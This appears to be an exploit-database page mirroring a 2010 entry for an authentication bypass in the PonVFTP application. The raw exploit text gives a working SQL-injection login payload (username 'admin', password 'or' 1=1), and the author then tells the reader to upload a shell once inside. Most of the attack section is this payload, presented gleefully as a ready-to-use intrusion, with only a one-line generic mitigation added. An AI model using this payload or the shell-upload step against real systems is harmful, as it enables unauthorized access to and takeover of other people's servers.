header-logo
Suggest Exploit
vendor:
PonVFTP
by:
S2K9
9,3
CVSS
HIGH
PonVFTP Bypass
287
CWE
Product Name: PonVFTP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

PonVFTP Bypass Vulnerability

By entering the username as 'admin' and password as 'or' 1=1, an attacker can bypass the authentication of PonVFTP and gain access to the application.

Mitigation:

The application should be configured to use strong authentication mechanisms and should not allow bypassing of authentication.
Source

Exploit-DB raw data:

in the name of allah

# Exploit Title: PonVFTP Bbypass Vulnerability
# Date: 15/1/2010

# Author:S2K9

# Site: www.soqor.net , www.xp10.me

# Software home: http://pongles.com/index.php

# Tested on: windows xp sp2

Dork :in u r dream

exploit : press login >>>
username : admin
password : 'or' 1=1
press in
yaaaaay u r in hehe
good look
go to browse and upload your shell

Greetz : R3d-D3v!L <<< my teacher and every Muslim hacker

Navigation

Suggest Exploit

Services By CQR